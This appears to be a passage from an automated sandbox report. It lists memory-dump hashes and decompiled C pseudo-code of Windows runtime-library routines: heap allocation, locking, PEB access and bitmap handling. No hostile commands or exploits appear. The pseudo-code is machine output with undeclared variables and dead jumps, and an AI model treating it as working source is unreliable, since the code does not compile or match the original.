                        0x02bbc1e4
                        0x02bbc1e4
                        0x02bbc1ec
                        0x02c02d7d
                        0x02c02d7d
                        0x02bbc1f3
                        0x02bbc1ff
                        0x02c02d88
                        0x02c02d8d
                        0x02c02d94
                        0x02c02d94
                        0x02c02d9f
                        0x02c02da4
                        0x02c02dab
                        0x02c02db0
                        0x02c02db2
                        0x02c02db3
                        0x02c02db4
                        0x02c02dbc
                        0x02c02dc3
                        0x02c02dc3
                        0x02bbc205
                        0x02bbc205
                        0x02bbc208
                        0x02bbc20e
                        0x02bbc211
                        0x02bbc216
                        0x02bbc219
                        0x02bbc21f
                        0x02bbc222
                        0x02bbc22c
                        0x02bbc234
                        0x02bbc23a
                        0x02bbc23f
                        0x02bbc245
                        0x02bbc24b
                        0x02bbc251
                        0x02bbc25a
                        0x02bbc276
                        0x02bbc27d
                        0x02bbc27d
                        0x02bbc25c
                        0x02bbc25c
                        0x00000000
                        0x02bbc25e
                        0x02bbc1a4
                        0x02bbc1aa
                        0x02bbc1b3
                        0x02bbc265
                        0x02bbc26c
                        0x02bbc26c
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: a44b99e463e857655bd0b5cfe6e4568448aa79d04f67dd1bd731f620613864a5
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: 6A314472A01646BFD706EBB0C490BF9FB55BF52304F04819BC4189B201DBB5AA4ADBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E02C43D40(intOrPtr __ecx, char* __edx) {
                        				signed int _v8;
                        				char* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed char _v24;
                        				char _v28;
                        				char _v29;
                        				intOrPtr* _v32;
                        				char _v36;
                        				char _v37;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char _t34;
                        				intOrPtr* _t37;
                        				intOrPtr* _t42;
                        				intOrPtr* _t47;
                        				intOrPtr* _t48;
                        				intOrPtr* _t49;
                        				char _t51;
                        				void* _t52;
                        				intOrPtr* _t53;
                        				char* _t55;
                        				char _t59;
                        				char* _t61;
                        				intOrPtr* _t64;
                        				void* _t65;
                        				char* _t67;
                        				void* _t68;
                        				signed int _t70;
                        
                        				_t62 = __edx;
                        				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                        				_v8 =  *0x2c8d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                        				_t34 =  &_v28;
                        				_v20 = __ecx;
                        				_t67 = __edx;
                        				_v24 = _t34;
                        				_t51 = 0;
                        				_v12 = __edx;
                        				_v29 = 0;
                        				_v28 = _t34;
                        				E02BB2280(_t34, 0x2c88a6c);
                        				_t64 =  *0x2c85768; // 0x77ad5768
                        				if(_t64 != 0x2c85768) {
                        					while(1) {
                        						_t8 = _t64 + 8; // 0x77ad5770
                        						_t42 = _t8;
                        						_t53 = _t64;
                        						 *_t42 =  *_t42 + 1;
                        						_v16 = _t42;
                        						E02BAFFB0(_t53, _t64, 0x2c88a6c);
                        						 *0x2c8b1e0(_v24, _t67);
                        						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                        							_v37 = 1;
                        						}
                        						E02BB2280(_t45, 0x2c88a6c);
                        						_t47 = _v28;
                        						_t64 =  *_t64;
                        						 *_t47 =  *_t47 - 1;
                        						if( *_t47 != 0) {
                        							goto L8;
                        						}
                        						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                        							L10:
                        							_push(3);
                        							asm("int 0x29");
                        						} else {
                        							_t48 =  *((intOrPtr*)(_t53 + 4));
                        							if( *_t48 != _t53) {
                        								goto L10;
                        							} else {
                        								 *_t48 = _t64;
                        								_t61 =  &_v36;
                        								 *((intOrPtr*)(_t64 + 4)) = _t48;
                        								_t49 = _v32;
                        								if( *_t49 != _t61) {
                        									goto L10;
                        								} else {
                        									 *_t53 = _t61;
                        									 *((intOrPtr*)(_t53 + 4)) = _t49;
                        									 *_t49 = _t53;
                        									_v32 = _t53;
                        									goto L8;
                        								}
                        							}
                        						}
                        						L11:
                        						_t51 = _v29;
                        						goto L12;
                        						L8:
                        						if(_t64 != 0x2c85768) {
                        							_t67 = _v20;
                        							continue;
                        						}
                        						goto L11;
                        					}
                        				}
                        				L12:
                        				E02BAFFB0(_t51, _t64, 0x2c88a6c);
                        				while(1) {
                        					_t37 = _v28;
                        					_t55 =  &_v28;
                        					if(_t37 == _t55) {
                        						break;
                        					}
                        					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                        						goto L10;
                        					} else {
                        						_t59 =  *_t37;
                        						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                        							goto L10;
                        						} else {
                        							_t62 =  &_v28;
                        							_v28 = _t59;
                        							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                        							continue;
                        						}
                        					}
                        					L18:
                        				}
                        				_pop(_t65);
                        				_pop(_t68);
                        				_pop(_t52);
                        				return E02BDB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                        				goto L18;
                        			}

































                        0x02c43d40
                        0x02c43d48
                        0x02c43d52
                        0x02c43d59
                        0x02c43d5d
                        0x02c43d61
                        0x02c43d63
                        0x02c43d67
                        0x02c43d69
                        0x02c43d72
                        0x02c43d76
                        0x02c43d7a
                        0x02c43d7f
                        0x02c43d8b
                        0x02c43d91
                        0x02c43d91
                        0x02c43d91
                        0x02c43d94
                        0x02c43d96
                        0x02c43d9d
                        0x02c43da1
                        0x02c43db0
                        0x02c43dba
                        0x02c43dbc
                        0x02c43dbc
                        0x02c43dc6
                        0x02c43dcb
                        0x02c43dcf
                        0x02c43dd1
                        0x02c43dd4
                        0x00000000
                        0x00000000
                        0x02c43dd9
                        0x02c43e0c
                        0x02c43e0c
                        0x02c43e0f
                        0x02c43ddb
                        0x02c43ddb
                        0x02c43de0
                        0x00000000
                        0x02c43de2
                        0x02c43de2
                        0x02c43de4
                        0x02c43de8
                        0x02c43deb
                        0x02c43df1
                        0x00000000
                        0x02c43df3
                        0x02c43df3
                        0x02c43df5
                        0x02c43df8
                        0x02c43dfa
                        0x00000000
                        0x02c43dfa
                        0x02c43df1
                        0x02c43de0
                        0x02c43e11
                        0x02c43e11
                        0x00000000
                        0x02c43dfe
                        0x02c43e04
                        0x02c43e06
                        0x00000000
                        0x02c43e06
                        0x00000000
                        0x02c43e04
                        0x02c43d91
                        0x02c43e15
                        0x02c43e1a
                        0x02c43e1f
                        0x02c43e1f
                        0x02c43e23
                        0x02c43e29
                        0x00000000
                        0x00000000
                        0x02c43e2e
                        0x00000000
                        0x02c43e30
                        0x02c43e30
                        0x02c43e35
                        0x00000000
                        0x02c43e37
                        0x02c43e3e
                        0x02c43e42
                        0x02c43e48
                        0x02c43e4e
                        0x00000000
                        0x02c43e4e
                        0x02c43e35
                        0x00000000
                        0x02c43e2e
                        0x02c43e5b
                        0x02c43e5c
                        0x02c43e5d
                        0x02c43e68
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38e35dc39a05325b8cc7a4258b82e89c05300f1fe79d8e3e003e52c9d2211acf
                        • Instruction ID: eae1140dc6a73a2f19de73fc827b064e621823203f04d03c250abc496d7a83ca
                        • Opcode Fuzzy Hash: 38e35dc39a05325b8cc7a4258b82e89c05300f1fe79d8e3e003e52c9d2211acf
                        • Instruction Fuzzy Hash: F831677150A382CFCB14DF14C88096ABBF1BFC5708F5589AEE4998B280DB30DE04CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BCA70E(intOrPtr* __ecx, char* __edx) {
                        				unsigned int _v8;
                        				intOrPtr* _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t28;
                        				char* _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t38;
                        				void* _t50;
                        				intOrPtr _t52;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t52 =  *0x2c87b10; // 0x8
                        				_t33 = __edx;
                        				_t48 = __ecx;
                        				_v12 = __ecx;
                        				if(_t52 == 0) {
                        					 *0x2c87b10 = 8;
                        					 *0x2c87b14 = 0x2c87b0c;
                        					 *0x2c87b18 = 1;
                        					L6:
                        					_t2 = _t52 + 1; // 0x9
                        					E02BCA990(0x2c87b10, _t2, 7);
                        					asm("bts ecx, eax");
                        					 *_t48 = _t52;
                        					 *_t33 = 1;
                        					L3:
                        					_t16 = 0;
                        					L4:
                        					return _t16;
                        				}
                        				_t17 = L02BCA840(__edx, __ecx, __ecx, _t52, 0x2c87b10, 1, 0);
                        				if(_t17 == 0xffffffff) {
                        					_t37 =  *0x2c87b10; // 0x8
                        					_t3 = _t37 + 0x27; // 0x2f
                        					__eflags = _t3 >> 5 -  *0x2c87b18; // 0x1
                        					if(__eflags > 0) {
                        						_t38 =  *0x2c87b9c; // 0x0
                        						_t4 = _t52 + 0x27; // 0x2f
                        						_v8 = _t4 >> 5;
                        						_t50 = L02BB4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                        						__eflags = _t50;
                        						if(_t50 == 0) {
                        							_t16 = 0xc0000017;
                        							goto L4;
                        						}
                        						 *0x2c87b18 = _v8;
                        						_t8 = _t52 + 7; // 0xf
                        						E02BDF3E0(_t50,  *0x2c87b14, _t8 >> 3);
                        						_t28 =  *0x2c87b14; // 0x77ad7b0c
                        						__eflags = _t28 - 0x2c87b0c;
                        						if(_t28 != 0x2c87b0c) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        						}
                        						_t9 = _t52 + 8; // 0x10
                        						 *0x2c87b14 = _t50;
                        						_t48 = _v12;
                        						 *0x2c87b10 = _t9;
                        						goto L6;
                        					}
                        					 *0x2c87b10 = _t37 + 8;
                        					goto L6;
                        				}
                        				 *__ecx = _t17;
                        				 *_t33 = 0;
                        				goto L3;
                        			}
















                        0x02bca713
                        0x02bca714
                        0x02bca717
                        0x02bca71d
                        0x02bca720
                        0x02bca722
                        0x02bca727
                        0x02bca74a
                        0x02bca754
                        0x02bca75e
                        0x02bca768
                        0x02bca76a
                        0x02bca773
                        0x02bca78b
                        0x02bca790
                        0x02bca792
                        0x02bca741
                        0x02bca741
                        0x02bca743
                        0x02bca749
                        0x02bca749
                        0x02bca732
                        0x02bca73a
                        0x02bca797
                        0x02bca79d
                        0x02bca7a3
                        0x02bca7a9
                        0x02bca7b6
                        0x02bca7bc
                        0x02bca7ca
                        0x02bca7e0
                        0x02bca7e2
                        0x02bca7e4
                        0x02c09bf2
                        0x00000000
                        0x02c09bf2
                        0x02bca7ed
                        0x02bca7f2
                        0x02bca800
                        0x02bca805
                        0x02bca80d
                        0x02bca812
                        0x02c09c08
                        0x02c09c08
                        0x02bca818
                        0x02bca81b
                        0x02bca821
                        0x02bca824
                        0x00000000
                        0x02bca824
                        0x02bca7ae
                        0x00000000
                        0x02bca7ae
                        0x02bca73c
                        0x02bca73e
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02075187100ff5e6de847239d733a3c7574f90b611f4713feacc8a37428223dc
                        • Instruction ID: bf6a43aa90da66abe8b356ed922bbd347bfeb0afe03ef51c9434902f27a0cd56
                        • Opcode Fuzzy Hash: 02075187100ff5e6de847239d733a3c7574f90b611f4713feacc8a37428223dc
                        • Instruction Fuzzy Hash: 543181B9A40208DBD711CF18DC90F75B7FAFB84710F348EAAE01597240E771A915CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E02B9AA16(signed short* __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				signed short _v16;
                        				intOrPtr _v20;
                        				signed short _v24;
                        				signed short _v28;
                        				void* _v32;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t25;
                        				signed short _t38;
                        				signed short* _t42;
                        				signed int _t44;
                        				signed short* _t52;
                        				signed short _t53;
                        				signed int _t54;
                        
                        				_v8 =  *0x2c8d360 ^ _t54;
                        				_t42 = __ecx;
                        				_t44 =  *__ecx & 0x0000ffff;
                        				_t52 =  &(__ecx[2]);
                        				_t51 = _t44 + 2;
                        				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                        					L4:
                        					_t25 =  *0x2c87b9c; // 0x0
                        					_t53 = L02BB4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                        					__eflags = _t53;
                        					if(_t53 == 0) {
                        						L3:
                        						return E02BDB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                        					} else {
                        						E02BDF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                        						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                        						L2:
                        						_t51 = 4;
                        						if(L02BA6C59(_t53, _t51, _t58) != 0) {
                        							_t28 = E02BC5E50(0x2b7c338, 0, 0,  &_v32);
                        							__eflags = _t28;
                        							if(_t28 == 0) {
                        								_t38 = ( *_t42 & 0x0000ffff) + 2;
                        								__eflags = _t38;
                        								_v24 = _t53;
                        								_v16 = _t38;
                        								_v20 = 0;
                        								_v12 = 0;
                        								E02BCB230(_v32, _v28, 0x2b7c2d8, 1,  &_v24);
                        								_t28 = E02B9F7A0(_v32, _v28);
                        							}
                        							__eflags = _t53 -  *_t52;
                        							if(_t53 !=  *_t52) {
                        								_t28 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						goto L3;
                        					}
                        				}
                        				_t53 =  *_t52;
                        				_t44 = _t44 >> 1;
                        				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                        				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}




















                        0x02b9aa25
                        0x02b9aa29
                        0x02b9aa2d
                        0x02b9aa30
                        0x02b9aa37
                        0x02b9aa3c
                        0x02bf4458
                        0x02bf4458
                        0x02bf4472
                        0x02bf4474
                        0x02bf4476
                        0x02b9aa64
                        0x02b9aa74
                        0x02bf447c
                        0x02bf4483
                        0x02bf4492
                        0x02b9aa52
                        0x02b9aa54
                        0x02b9aa5e
                        0x02bf44a8
                        0x02bf44ad
                        0x02bf44af
                        0x02bf44b6
                        0x02bf44b6
                        0x02bf44b9
                        0x02bf44bc
                        0x02bf44cd
                        0x02bf44d3
                        0x02bf44d6
                        0x02bf44e1
                        0x02bf44e1
                        0x02bf44e6
                        0x02bf44e8
                        0x02bf44fb
                        0x02bf44fb
                        0x02bf44e8
                        0x00000000
                        0x02b9aa5e
                        0x02bf4476
                        0x02b9aa42
                        0x02b9aa46
                        0x02b9aa48
                        0x02b9aa4c
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b308aecd1f9c1c9c4ba62401bdd44bd5a6985037dc1d3c702a08af10fe5951ae
                        • Instruction ID: 928e7b3471efc19232d2b1cad5444a43e267e27a1f904502de460b931e685ea8
                        • Opcode Fuzzy Hash: b308aecd1f9c1c9c4ba62401bdd44bd5a6985037dc1d3c702a08af10fe5951ae
                        • Instruction Fuzzy Hash: 0331D572A00219ABDF119F64CD81ABFB7B9FF04700F1544AAF912EB150EB749D11DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E02BC61A0(signed int* __ecx) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				void* _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t49;
                        				signed int _t51;
                        				intOrPtr _t52;
                        				signed int _t54;
                        				void* _t59;
                        				signed int* _t61;
                        				intOrPtr* _t64;
                        
                        				_t61 = __ecx;
                        				_v12 = 0;
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        				_v16 = __ecx;
                        				_v8 = 0;
                        				if(_t30 == 0) {
                        					L6:
                        					_t31 = 0;
                        					L7:
                        					return _t31;
                        				}
                        				_t32 = _t30 + 0x5d8;
                        				if(_t32 == 0) {
                        					goto L6;
                        				}
                        				_t59 = _t32 + 0x30;
                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                        					goto L6;
                        				}
                        				if(__ecx != 0) {
                        					 *((intOrPtr*)(__ecx)) = 0;
                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                        				}
                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                        					_t51 =  *(_t32 + 0x10);
                        					_t33 = _t32 + 0x10;
                        					_v20 = _t33;
                        					_t54 =  *(_t33 + 4);
                        					if((_t51 | _t54) == 0) {
                        						_t37 = E02BC5E50(0x2b767cc, 0, 0,  &_v12);
                        						if(_t37 != 0) {
                        							goto L6;
                        						}
                        						_t52 = _v8;
                        						asm("lock cmpxchg8b [esi]");
                        						_t64 = _v16;
                        						_t49 = _t37;
                        						_v20 = 0;
                        						if(_t37 == 0) {
                        							if(_t64 != 0) {
                        								 *_t64 = _v12;
                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                        							}
                        							E02C69D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                        							_t31 = 1;
                        							goto L7;
                        						}
                        						E02B9F7C0(_t52, _v12, _t52, 0);
                        						if(_t64 != 0) {
                        							 *_t64 = _t49;
                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                        						}
                        						L12:
                        						_t31 = 1;
                        						goto L7;
                        					}
                        					if(_t61 != 0) {
                        						 *_t61 = _t51;
                        						_t61[1] = _t54;
                        					}
                        					goto L12;
                        				} else {
                        					goto L6;
                        				}
                        			}



















                        0x02bc61b3
                        0x02bc61b5
                        0x02bc61bd
                        0x02bc61c3
                        0x02bc61c7
                        0x02bc61d2
                        0x02bc61ff
                        0x02bc61ff
                        0x02bc6201
                        0x02bc6207
                        0x02bc6207
                        0x02bc61d4
                        0x02bc61d9
                        0x00000000
                        0x00000000
                        0x02bc61df
                        0x02bc61e2
                        0x00000000
                        0x00000000
                        0x02bc61e6
                        0x02bc61e8
                        0x02bc61ee
                        0x02bc61ee
                        0x02bc61f9
                        0x02c0762f
                        0x02c07632
                        0x02c07635
                        0x02c07639
                        0x02c07640
                        0x02c0766e
                        0x02c07675
                        0x00000000
                        0x00000000
                        0x02c07681
                        0x02c07689
                        0x02c0768d
                        0x02c07691
                        0x02c07695
                        0x02c07699
                        0x02c076af
                        0x02c076b5
                        0x02c076b7
                        0x02c076b7
                        0x02c076d7
                        0x02c076dc
                        0x00000000
                        0x02c076dc
                        0x02c076a2
                        0x02c076a9
                        0x02c07651
                        0x02c07653
                        0x02c07653
                        0x02c07656
                        0x02c07656
                        0x00000000
                        0x02c07656
                        0x02c07644
                        0x02c07646
                        0x02c07648
                        0x02c07648
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92c48f08cdc1a635cfb12cb70ea4960bca24c836f5c0dd61d20462d890d6a307
                        • Instruction ID: 62b2643e95c32e55330bcdd4dd67b662551dcc93234dec86c858e1a2dad760a1
                        • Opcode Fuzzy Hash: 92c48f08cdc1a635cfb12cb70ea4960bca24c836f5c0dd61d20462d890d6a307
                        • Instruction Fuzzy Hash: 67319C71A057018FD324CF59C840B26F7E9FB88B04F1449ADE995DB391E770E944CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E02BD4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				signed int* _v12;
                        				char _v13;
                        				signed int _v16;
                        				char _v21;
                        				signed int* _v24;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t29;
                        				signed int* _t32;
                        				signed int* _t41;
                        				signed int _t42;
                        				void* _t43;
                        				intOrPtr* _t51;
                        				void* _t52;
                        				signed int _t53;
                        				signed int _t58;
                        				void* _t59;
                        				signed int _t60;
                        				signed int _t62;
                        
                        				_t49 = __edx;
                        				_t62 = (_t60 & 0xfffffff8) - 0xc;
                        				_t26 =  *0x2c8d360 ^ _t62;
                        				_v8 =  *0x2c8d360 ^ _t62;
                        				_t41 = __ecx;
                        				_t51 = __edx;
                        				_v12 = __ecx;
                        				if(_a4 == 0) {
                        					if(_a8 != 0) {
                        						goto L1;
                        					}
                        					_v13 = 1;
                        					E02BB2280(_t26, 0x2c88608);
                        					_t58 =  *_t41;
                        					if(_t58 == 0) {
                        						L11:
                        						E02BAFFB0(_t41, _t51, 0x2c88608);
                        						L2:
                        						 *0x2c8b1e0(_a4, _a8);
                        						_t42 =  *_t51();
                        						if(_t42 == 0) {
                        							_t29 = 0;
                        							L5:
                        							_pop(_t52);
                        							_pop(_t59);
                        							_pop(_t43);
                        							return E02BDB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                        						}
                        						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                        						if(_v21 != 0) {
                        							_t53 = 0;
                        							E02BB2280(_t28, 0x2c88608);
                        							_t32 = _v24;
                        							if( *_t32 == _t58) {
                        								 *_t32 = _t42;
                        								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                        								if(_t58 != 0) {
                        									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                        									asm("sbb edi, edi");
                        									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                        								}
                        							}
                        							E02BAFFB0(_t42, _t53, 0x2c88608);
                        							if(_t53 != 0) {
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						_t29 = _t42;
                        						goto L5;
                        					}
                        					if( *((char*)(_t58 + 0x40)) != 0) {
                        						L10:
                        						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                        						E02BAFFB0(_t41, _t51, 0x2c88608);
                        						_t29 = _t58;
                        						goto L5;
                        					}
                        					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        						goto L11;
                        					}
                        					goto L10;
                        				}
                        				L1:
                        				_v13 = 0;
                        				_t58 = 0;
                        				goto L2;
                        			}
























                        0x02bd4a2c
                        0x02bd4a34
                        0x02bd4a3c
                        0x02bd4a3e
                        0x02bd4a48
                        0x02bd4a4b
                        0x02bd4a4d
                        0x02bd4a51
                        0x02bd4a9c
                        0x00000000
                        0x00000000
                        0x02bd4aa3
                        0x02bd4aa8
                        0x02bd4aad
                        0x02bd4ab1
                        0x02bd4ade
                        0x02bd4ae3
                        0x02bd4a5a
                        0x02bd4a62
                        0x02bd4a6a
                        0x02bd4a6e
                        0x02c0f203
                        0x02bd4a84
                        0x02bd4a88
                        0x02bd4a89
                        0x02bd4a8a
                        0x02bd4a95
                        0x02bd4a95
                        0x02bd4a79
                        0x02bd4a80
                        0x02bd4af2
                        0x02bd4af4
                        0x02bd4af9
                        0x02bd4aff
                        0x02bd4b01
                        0x02bd4b03
                        0x02bd4b08
                        0x02c0f20a
                        0x02c0f212
                        0x02c0f216
                        0x02c0f216
                        0x02bd4b08
                        0x02bd4b13
                        0x02bd4b1a
                        0x02c0f229
                        0x02c0f229
                        0x02bd4b1a
                        0x02bd4a82
                        0x00000000
                        0x02bd4a82
                        0x02bd4ab7
                        0x02bd4acd
                        0x02bd4acd
                        0x02bd4ad5
                        0x02bd4ada
                        0x00000000
                        0x02bd4ada
                        0x02bd4ac2
                        0x02bd4acb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bd4acb
                        0x02bd4a53
                        0x02bd4a53
                        0x02bd4a58
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bef339e1a5a2e00b4f90f439e76969279fc54cdd2f82a6ba751ada63e772911d
                        • Instruction ID: 8659353ed977fd29d19bfec707f0b499cd9a28e0a1e07aaeb866b39ca1213c22
                        • Opcode Fuzzy Hash: bef339e1a5a2e00b4f90f439e76969279fc54cdd2f82a6ba751ada63e772911d
                        • Instruction Fuzzy Hash: FF3100322053509BD731AF14C980BAABBF5FFC5B14F4085A9E8664BA80EBB0D800DB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02BD8EC7(void* __ecx, void* __edx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				signed int* _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				intOrPtr _v56;
                        				signed int* _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				char* _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int* _v108;
                        				char _v140;
                        				signed int _v144;
                        				signed int _v148;
                        				intOrPtr _v152;
                        				char _v156;
                        				intOrPtr _v160;
                        				char _v164;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t67;
                        				intOrPtr _t70;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t73;
                        
                        				_t69 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t73;
                        				_t48 =  *[fs:0x30];
                        				_t72 = __edx;
                        				_t71 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                        					_t48 = E02BC4E70(0x2c886e4, 0x2bd9490, 0, 0);
                        					if( *0x2c853e8 > 5 && E02BD8F33(0x2c853e8, 0, 0x2000) != 0) {
                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                        						_v108 =  &_v84;
                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                        						_v76 =  &_v156;
                        						_t70 = 8;
                        						_v60 =  &_v144;
                        						_t67 = 4;
                        						_v44 =  &_v148;
                        						_v152 = 0;
                        						_v160 = 0;
                        						_v104 = 0;
                        						_v100 = 2;
                        						_v96 = 0;
                        						_v88 = 0;
                        						_v80 = 0;
                        						_v72 = 0;
                        						_v68 = _t70;
                        						_v64 = 0;
                        						_v56 = 0;
                        						_v52 = 0x2c853e8;
                        						_v48 = 0;
                        						_v40 = 0;
                        						_v36 = 0x2c853e8;
                        						_v32 = 0;
                        						_v28 =  &_v164;
                        						_v24 = 0;
                        						_v20 = _t70;
                        						_v16 = 0;
                        						_t69 = 0x2b7bc46;
                        						_t48 = E02C17B9C(0x2c853e8, 0x2b7bc46, _t67, 0x2c853e8, _t70,  &_v140);
                        					}
                        				}
